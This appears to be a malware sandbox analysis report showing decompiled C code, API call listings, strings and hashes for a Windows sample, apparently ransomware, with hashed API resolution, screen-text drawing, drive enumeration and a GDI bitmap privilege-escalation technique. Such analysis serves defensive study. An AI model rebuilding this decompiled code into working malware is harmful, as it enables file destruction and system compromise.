						E00404DB4(__eflags);
						_t264 = E0040C469(0x419844, __eflags);
						__eflags = _t264 - 0x4000;
						if(_t264 < 0x4000) {
							_v8 = 0;
							_push(0x630);
							_t271 = E0040C739( &_v8);
							__eflags = _t271;
							if(_t271 != 0) {
								_t272 = E004010BB(0, 3, 0x9c5ea346);
								 *_t272(0x14, 0, _v8, 3);
								VirtualFree(_v8, 0, 0x8000);
							}
						}
						_t265 = E004010BB(0, 1, 0x6fb89af0);
						_t266 =  *_t265(0, 0, E00406C84, 0, 0, 0);
						__eflags = _t266;
						if(_t266 == 0) {
							WaitForSingleObject(0, 0xffffffff);
						}
						_push(0);
						E00406C84();
						E004095B4( &_v780);
						__eflags = 0;
						return 0;
					}
				}
				goto L23;
			}

0x0040534a
0x00405354
0x0040535d
0x00405365
0x00405370
0x0040537a
0x00405384
0x0040538e
0x00405398
0x004053a2
0x004053ac
0x004053b6
0x004053c0
0x004053cf
0x004053dc
0x004053e6
0x004053f0
0x004053fa
0x00405404
0x0040540e
0x00405418
0x00405422
0x0040542c
0x00405436
0x00405445
0x00405452
0x0040545c
0x00405466
0x00405470
0x0040547a
0x00405484
0x0040548e
0x00405498
0x004054a2
0x004054ac
0x004054b6
0x004054c4
0x004054ce
0x004054d5
0x004054dc
0x004054e3
0x004054ea
0x004054f1
0x004054f8
0x004054ff
0x0040550a
0x00405517
0x00405521
0x0040552b
0x00405535
0x0040553f
0x00405549
0x00405553
0x0040555d
0x00405567
0x00405571
0x00405580
0x00405586
0x00405590
0x004055a0
0x004055ab
0x004055b5
0x004055bf
0x004055c9
0x004055d3
0x004055dd
0x004055e7
0x004055f6
0x00405603
0x0040560d
0x00405617
0x00405621
0x0040562b
0x00405635
0x0040563f
0x00405649
0x00405653
0x0040565d
0x00405667
0x00405675
0x0040567f
0x00405689
0x00405693
0x0040569d
0x004056a7
0x004056b1
0x004056bb
0x004056c5
0x004056cf
0x004056d9
0x004056e2
0x004056e9
0x004056f9
0x00405704
0x0040570e
0x00405718
0x00405722
0x0040572c
0x00405736
0x00405740
0x0040574a
0x00405754
0x0040575e
0x00405765
0x0040576f
0x00405777
0x0040577e
0x00405785
0x0040578c
0x00405793
0x0040579a
0x004057a1
0x004057a8
0x004057b2
0x004057ba
0x004057c1
0x004057c8
0x004057cf
0x004057d6
0x004057dd
0x004057e3
0x004057e8
0x0040582b
0x00405836
0x0040584e
0x00405853
0x00405859
0x0040585b
0x0040585d
0x0040585e
0x0040585e
0x0040585e
0x0040586b
0x00405876
0x00405883
0x0040588d
0x00405894
0x0040589b
0x004058a2
0x004058a9
0x004058b0
0x004058b7
0x004058c9
0x004058ce
0x004058dc
0x004058ea
0x004058f2
0x004058fd
0x00405907
0x00405911
0x0040591b
0x00405925
0x0040592f
0x00405939
0x00405943
0x0040594d
0x00405957
0x0040596c
0x00405971
0x0040597a
0x00405988
0x00405990
0x0040599b
0x004059a5
0x004059af
0x004059b9
0x004059c3
0x004059cd
0x004059d7
0x004059e1
0x004059eb
0x004059f5
0x00405a0b
0x00405a10
0x00405a19
0x00405a27
0x00405a29
0x00405a33
0x00405a3d
0x00405a4d
0x00405a58
0x00405a62
0x00405a6c
0x00405a76
0x00405a80
0x00405a8a
0x00405a94
0x00405a9e
0x00405aa8
0x00405abd
0x00405ac2
0x00405ac8
0x00405adb
0x00405aeb
0x00405af1
0x00405af2
0x00405af7
0x00405af9
0x00405afb
0x00405b00
0x00405b05
0x00405b07
0x00405b0c
0x00405b0f
0x00405b32
0x00405b35
0x00000000
0x00405b37
0x00405b3c
0x00405b3e
0x00000000
0x00405b40
0x00405b40
0x00405b40
0x00000000
0x00405b40
0x00405b3e
0x00000000
0x00405b11
0x00405b11
0x00405b11
0x00405b0f
0x00405b05
0x00405b16
0x00405b16
0x00405b1b
0x00405b1d
0x00405b1f
0x00405b24
0x00405b29
0x00405b2b
0x00000000
0x00405b2b
0x00405b29
0x00405b4b
0x00405b4d
0x00405c32
0x00405c32
0x00405c37
0x00405c3b
0x00405c3e
0x00405c3f
0x00405c42
0x00405c44
0x00405c4d
0x00405c50
0x00405c53
0x00405c55
0x00405c5b
0x00405c5e
0x00405c61
0x00405c69
0x00405b53
0x00405b53
0x00405b58
0x00405b5a
0x00000000
0x00405b60
0x00405b60
0x00405b65
0x00405b75
0x00405b7d
0x00405b85
0x00405b87
0x00405b93
0x00405b9a
0x00405b9d
0x00405b9f
0x00405ba4
0x00405bab
0x00405bb0
0x00405bb5
0x00405bb8
0x00405bbe
0x00405bc5
0x00405bc7
0x00405bd3
0x00405be0
0x00405beb
0x00405beb
0x00405bc7
0x00405bf8
0x00405c09
0x00405c0b
0x00405c0d
0x00405c12
0x00405c12
0x00405c18
0x00405c19
0x00405c24
0x00405c2b
0x00405c31
0x00405c31
0x00405b5a
0x00000000

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

SetErrorMode.KERNELBASE(00000001), ref: 0040535D

Part of subcall function 00401B43: GetProcessHeap.KERNEL32 ref: 00401BD3

Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004,00000000,00000000,00000000), ref: 0040A508
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004,00000000,00000000,00000000), ref: 0040A547
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004,00000000,00000000,00000000), ref: 0040A585
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040A7DB
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040A837
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004,00000000,00000000,00000000), ref: 0040A854
Part of subcall function 0040A4E1: VirtualFree.KERNEL32(?,00000000,00008000,80000001,00000000,00000000,?,00000040,00000000), ref: 0040A9C6
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,0000008A,00003000,00000004,00000000,00000000,00000000), ref: 0040A9E4
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0040A9FE
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040AB50
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040AB97
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040ABE3
Part of subcall function 0040A4E1: VirtualFree.KERNELBASE(?,00000000,00008000,80000001,?,?,-0000000E,00000080,00000000), ref: 0040ABF2
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000082,00003000,00000004,00000000,00000000,00000000), ref: 0040AC10
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040B014
Part of subcall function 0040A4E1: GetNativeSystemInfo.KERNEL32(?,00000000,00000000,00000000), ref: 0040B039
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000040,00003000,00000004), ref: 0040B048
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040B11C
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,00000000,00000000,00000000), ref: 0040B1A1
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0040B1B5
Part of subcall function 0040A4E1: lstrlenW.KERNEL32(?,80000002,?,00000000,?,00000080,00000000), ref: 0040B48E
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040B4C8
Part of subcall function 0040A4E1: lstrlenW.KERNEL32(?), ref: 0040B538
Part of subcall function 0040A4E1: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0040B581
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,?,?,?,?,00000000,00000000,00000000), ref: 0040B8D1
Part of subcall function 0040A4E1: GetDriveTypeW.KERNELBASE(?,?,?,?,?,00000000,00000000,00000000), ref: 0040B937
Part of subcall function 0040A4E1: GetDiskFreeSpaceW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9D3
Part of subcall function 0040A4E1: lstrlenW.KERNEL32(2B24007A,?,00000000,?,00000000,?,00000000,?,00000000), ref: 0040BA25
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040BA46
Part of subcall function 0040A4E1: lstrlenW.KERNEL32(2B24007A,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040BA54
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040BA6E
Part of subcall function 0040A4E1: lstrlenW.KERNEL32(2B24007A,?,?,?,?,00000000,00000000,00000000), ref: 0040BAB1

Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A38A
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A395
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3A9
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3B4
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3CA
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3D5
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3EB
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3F6
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A40C
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A417
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A42D
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A438
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A44E
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A459
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A46F
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A47A
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A499
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A4A4
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A4C0
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A4CE

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

ExitProcess.KERNEL32 ref: 0040585E

Part of subcall function 004096FA: wsprintfW.USER32 ref: 0040999B
Part of subcall function 004096FA: wsprintfW.USER32 ref: 004099AA
Part of subcall function 004096FA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00409A0B

lstrlenW.KERNEL32 ref: 00405AD1
lstrlenW.KERNEL32 ref: 00405AE0

Part of subcall function 004074E3: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004,7757BFA8), ref: 004074F8
Part of subcall function 004074E3: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407555

Part of subcall function 0040EC32: LoadLibraryW.KERNEL32(?), ref: 0040ECC0
Part of subcall function 0040EC32: GetProcAddress.KERNEL32(00000000,?), ref: 0040ED2B
Part of subcall function 0040EC32: lstrlenW.KERNEL32(00000000,2CA1B5F0), ref: 0040EDBA
Part of subcall function 0040EC32: lstrlenW.KERNEL32(00000000), ref: 0040EDC7
Part of subcall function 0040EC32: GetModuleHandleW.KERNEL32(?), ref: 0040EFE5
Part of subcall function 0040EC32: GetProcAddress.KERNEL32(00000000,?), ref: 0040EFF8
Part of subcall function 0040EC32: lstrlenW.KERNEL32(00000000), ref: 0040F0DF
Part of subcall function 0040EC32: lstrlenW.KERNEL32(?), ref: 0040F0EA
Part of subcall function 0040EC32: lstrlenW.KERNEL32(?,00000003,00000000,?,?), ref: 0040F100
Part of subcall function 0040EC32: lstrlenW.KERNEL32(00000000), ref: 0040F23B
Part of subcall function 0040EC32: lstrlenW.KERNEL32(?), ref: 0040F246
Part of subcall function 0040EC32: lstrlenW.KERNEL32(?), ref: 0040F251
Part of subcall function 0040EC32: lstrlenW.KERNEL32(00000000), ref: 0040F305
Part of subcall function 0040EC32: lstrlenW.KERNEL32(?), ref: 0040F310
Part of subcall function 0040EC32: lstrlenW.KERNEL32(?,00000003,00000000,?,?), ref: 0040F326
Part of subcall function 0040EC32: lstrlenW.KERNEL32(00000000), ref: 0040F447
Part of subcall function 0040EC32: lstrlenW.KERNEL32(?), ref: 0040F452
Part of subcall function 0040EC32: lstrlenW.KERNEL32(?), ref: 0040F45D
Part of subcall function 0040EC32: lstrlenW.KERNEL32(?,00000004,00000000,?,?,?), ref: 0040F47A
Part of subcall function 0040EC32: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 0040F5B7
Part of subcall function 0040EC32: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 0040F5E6
Part of subcall function 0040EC32: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000003,00000080,00000000), ref: 0040F71A
Part of subcall function 0040EC32: WriteFile.KERNEL32(00000000,00417E18,00001A00,?,00000000), ref: 0040F72F
Part of subcall function 0040EC32: Sleep.KERNEL32(000003E8), ref: 0040F740
Part of subcall function 0040EC32: CloseHandle.KERNEL32(000000FF), ref: 0040F769
Part of subcall function 0040EC32: CoInitialize.OLE32(00000000), ref: 0040F772
Part of subcall function 0040EC32: CoCreateInstance.OLE32(004119CC,00000000,00000001,004119DC,?), ref: 0040F792
Part of subcall function 0040EC32: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040F79D
Part of subcall function 0040EC32: CoUninitialize.OLE32 ref: 0040F984
Part of subcall function 0040EC32: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0040F990

Part of subcall function 0040D6E6: GetModuleHandleW.KERNEL32(?,2CA1B5F0,7757BFA8,00000000), ref: 0040D74F
Part of subcall function 0040D6E6: GetProcAddress.KERNEL32(00000000,?), ref: 0040D7B7
Part of subcall function 0040D6E6: VirtualQuery.KERNEL32(00000100,00000000,00001000), ref: 0040D9FD
Part of subcall function 0040D6E6: GetProcAddress.KERNEL32(00000000,0000004E), ref: 0040DA08
Part of subcall function 0040D6E6: VirtualFree.KERNEL32(00000100,00000000,00008000), ref: 0040DA61
Part of subcall function 0040D6E6: CreateBitmap.GDI32(00000060,00000001,00000001,00000020,?), ref: 0040DAA6
Part of subcall function 0040D6E6: CreateBitmap.GDI32(00000060,00000001,00000001,00000020,?), ref: 0040DABC
Part of subcall function 0040D6E6: SetBitmapBits.GDI32(?,00000004,?), ref: 0040DD41
Part of subcall function 0040D6E6: GetBitmapBits.GDI32(?,00000004,00000000), ref: 0040DD4D
Part of subcall function 0040D6E6: SetBitmapBits.GDI32(?,00000004,X@), ref: 0040DD5A
Part of subcall function 0040D6E6: GetProcAddress.KERNEL32(?,?), ref: 0040DD91
Part of subcall function 0040D6E6: GetProcAddress.KERNEL32(?,7551744E), ref: 0040DDA5
Part of subcall function 0040D6E6: SetBitmapBits.GDI32(?,00000004,00000000), ref: 0040DDCD
Part of subcall function 0040D6E6: VirtualFree.KERNEL32(00000100,00000000,00008000), ref: 0040DDD9

InitializeCriticalSection.KERNEL32(0041982C), ref: 00405B75
InitializeCriticalSection.KERNEL32(00419844), ref: 00405B7D
InitializeCriticalSection.KERNEL32(0041985C), ref: 00405B85

Part of subcall function 00403AEE: VirtualUnlock.KERNEL32(00000000,00000800), ref: 00403B61
Part of subcall function 00403AEE: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00403B6D
Part of subcall function 00403AEE: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403BB1

DeleteCriticalSection.KERNEL32(0041985C), ref: 00405B93
DeleteCriticalSection.KERNEL32(0041982C), ref: 00405B9A
DeleteCriticalSection.KERNEL32(00419844), ref: 00405B9D

Part of subcall function 0040C469: GetTokenInformation.KERNELBASE(?,00000019,?,0000004C,?), ref: 0040C4BE

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BEB
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00405C12

Part of subcall function 00406C84: wsprintfW.USER32 ref: 00406D9B
Part of subcall function 00406C84: ExitThread.KERNEL32 ref: 00406DCB

Part of subcall function 004095B4: VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,7757BFA8,00404BBB), ref: 00409615
Part of subcall function 004095B4: VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,7757BFA8,00404BBB), ref: 004096CF

Part of subcall function 0040C739: GetDC.USER32(00000000), ref: 0040C74D
Part of subcall function 0040C739: CreateCompatibleDC.GDI32(00000000), ref: 0040C762
Part of subcall function 0040C739: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040C77B
Part of subcall function 0040C739: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040C785
Part of subcall function 0040C739: CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040C791
Part of subcall function 0040C739: SelectObject.GDI32(00000000,00000000), ref: 0040C7A7
Part of subcall function 0040C739: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040C7B6
Part of subcall function 0040C739: MulDiv.KERNEL32(00000012,00000000,00000048), ref: 0040C7C1
Part of subcall function 0040C739: CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 0040C7DE
Part of subcall function 0040C739: SelectObject.GDI32(00000000,00000000), ref: 0040C7F4
Part of subcall function 0040C739: SetBkColor.GDI32(00000000,00000000), ref: 0040C803
Part of subcall function 0040C739: SetTextColor.GDI32(00000000,000000C8), ref: 0040C80F
Part of subcall function 0040C739: GetStockObject.GDI32(00000002), ref: 0040C817
Part of subcall function 0040C739: FillRect.USER32(00000000,00000000,00000000), ref: 0040C834
Part of subcall function 0040C739: wsprintfA.USER32 ref: 0040C9B1
Part of subcall function 0040C739: DrawTextA.USER32(00000000,?,000000FF,00000000,00000011), ref: 0040C9CA
Part of subcall function 0040C739: DrawTextA.USER32(00000000,?,000000FF,00000000,00000011), ref: 0040CA0A
Part of subcall function 0040C739: wsprintfW.USER32 ref: 0040CBB4
Part of subcall function 0040C739: wsprintfW.USER32 ref: 0040CBC9
Part of subcall function 0040C739: DrawTextW.USER32(00000000,?,000000FF,00000000,00000011), ref: 0040CBEF
Part of subcall function 0040C739: DrawTextA.USER32(00000000,00000000,000000FF,00000000,00000011), ref: 0040CD5E
Part of subcall function 0040C739: wsprintfA.USER32 ref: 0040CECB
Part of subcall function 0040C739: DrawTextA.USER32(00000000,?,000000FF,00000000,00000011), ref: 0040CEEE
Part of subcall function 0040C739: VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004), ref: 0040CF30
Part of subcall function 0040C739: GetTempPathW.KERNEL32(00000100,00405BC3), ref: 0040CFCE
Part of subcall function 0040C739: SelectObject.GDI32(00000000,?), ref: 0040D000
Part of subcall function 0040C739: DeleteObject.GDI32(?), ref: 0040D00C
Part of subcall function 0040C739: SelectObject.GDI32(00000000,?), ref: 0040D021
Part of subcall function 0040C739: DeleteObject.GDI32(?), ref: 0040D028
Part of subcall function 0040C739: DeleteDC.GDI32(00000000), ref: 0040D02F
Part of subcall function 0040C739: ReleaseDC.USER32(00000000,00000000), ref: 0040D03E

Part of subcall function 00405157: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00405178
Part of subcall function 00405157: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00405186
Part of subcall function 00405157: wsprintfW.USER32 ref: 0040527F
Part of subcall function 00405157: ExitProcess.KERNEL32 ref: 0040533A

Part of subcall function 00404FB4: CreateMutexW.KERNELBASE(00000000,00000000,AversSucksForever), ref: 00404FEB

Part of subcall function 00401D43: VirtualAlloc.KERNELBASE(00000000,00000114,00003000,00000004), ref: 00401F90

Strings

301, xrefs: 004058E4
o)<, xrefs: 00405A33
q\_|, xrefs: 004054F1
Yf:, xrefs: 0040579A
w\_|, xrefs: 004054EA
5.2, xrefs: 00405A21
+~, xrefs: 004053C0
s;i, xrefs: 00405A8A
yw&{, xrefs: 004053DC
1602, xrefs: 00405982

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: lstrlen$Virtual$wsprintf$Alloc$Free$CreateObject$Bitmap$AddressCriticalDeleteProcSectionText$Draw$BitsInitializeSelect$CapsDeviceExitHandleProcess$ColorCompatibleEnvironmentExpandFileLibraryLoadModuleSingleStringsWait$CloseDiskDriveErrorEventFillFontHeapInfoInformationInstanceModeMutexNativePathQueryRectReleaseSleepSpaceStockSystemTempThreadTokenTypeUninitializeUnlockWrite
String ID: +~$1602$301$5.2$Yf:$q\_|$w\_|$yw&{$o)<$s;i
API String ID: 3366286684-3731514117
Opcode ID: e01dddfcf0a64429106f55caaf6a1a9527ef04252551229435d2f3d97949a479
Instruction ID: cd097d0f13a25349bcda108ffef4cf505c31e3c7d8d9e0d29a32b681ae563881
Opcode Fuzzy Hash: e01dddfcf0a64429106f55caaf6a1a9527ef04252551229435d2f3d97949a479
Instruction Fuzzy Hash: 932238B0C04228AEDF20EFA19C85BDEBB78FB05344F1081EAE5497B251DB755A81CF59

Uniqueness

Uniqueness Score: 100.00%

Function 00409A23, Relevance: 37.2, APIs: 8, Strings: 13, Instructions: 418
memorystringprocessUNIQUE

Download Yara Rule

C-Code - Quality: 84%

			E00409A23(void* __eflags, void** _a4, intOrPtr* _a8) {
				int _v8;
				int _v12;
				int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				short _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				char _v228;
				short _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				char _v276;
				short _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				char _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				char _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				char _v420;
				short _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				char _v472;
				short _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				char _v524;
				short _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				char _v576;
				short _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				char _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				char _v688;
				void* _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				void* _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				void* __ebx;
				void* _t247;
				intOrPtr _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				intOrPtr _t273;
				void* _t277;
				void* _t279;
				void* _t281;
				WCHAR* _t290;
				intOrPtr* _t295;
				void* _t299;
				intOrPtr* _t302;
				void* _t305;
				WCHAR** _t309;
				void* _t310;
				intOrPtr* _t311;
				intOrPtr _t341;
				void* _t348;
				signed int _t352;
				void* _t354;
				void* _t355;
				void* _t356;

				E004010BB(_t305, 1, 0x697a6afe);
				_t247 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_v60 = 0x90bb1c9;
				_v56 = 0xe0eb488;
				_v52 = 0x75761a8c;
				 *_a4 = _t247;
				_v48 = 0x88b1dc42;
				_v44 = 0xe1d02d17;
				_v40 = 0xe1d02d07;
				_v36 = 0x54b64c2a;
				_v32 = 0xe8d65b72;
				_v28 = 0x9837ded3;
				_v24 = 0xc3ba4727;
				_v20 = E00407563( &_v60);
				_v184 = 0x21950496;
				_v180 = 0xd895e8d4;
				_v176 = 0x87644894;
				_v172 = 0x19acadf8;
				_v168 = 0x54edba8c;
				_v164 = 0x54edba9e;
				_v160 = 0x56a2c862;
				_v156 = 0x7be2a21f;
				_v152 = 0xd909b3f7;
				_v148 = 0x5cc2b2b9;
				_v144 = 0x745c;
				_v16 = E00407563( &_v184);
				_v228 = 0x22d71067;
				_v224 = 0xee915292;
				_v220 = 0xf6c81c0d;
				_v216 = 0x4b48f050;
				_v212 = 0x277e175b;
				_v208 = 0x277e174f;
				_v204 = 0xcbc22855;
				_v200 = 0x2a29b788;
				_v196 = 0x2eddcd3;
				_v192 = 0x11687c4e;
				_v188 = 0x32622e5c;
				_v12 = E00407563( &_v228);
				_v372 = 0x3c26eb05;
				_v368 = 0x524da051;
				_v364 = 0x935c99a2;
				_v360 = 0xd08d6cee;
				_v356 = 0x43c0d58e;
				_v352 = 0x43c0d596;
				_v348 = 0xd5cb1c64;
				_v344 = 0x6f4706c1;
				_v340 = 0x4cde7e26;
				_v336 = 0x631f7946;
				_v332 = 0xf007880e;
				_v328 = 0xda5fae23;
				_v8 = E00407563( &_v372);
				_v688 = 0xe42e99c9;
				_v684 = 0xcc241604;
				_v680 = 0xef6ccfe7;
				_v676 = 0xfc129ada;
				_v672 = 0xf7e77ebe;
				_v668 = 0xf7e77e9a;
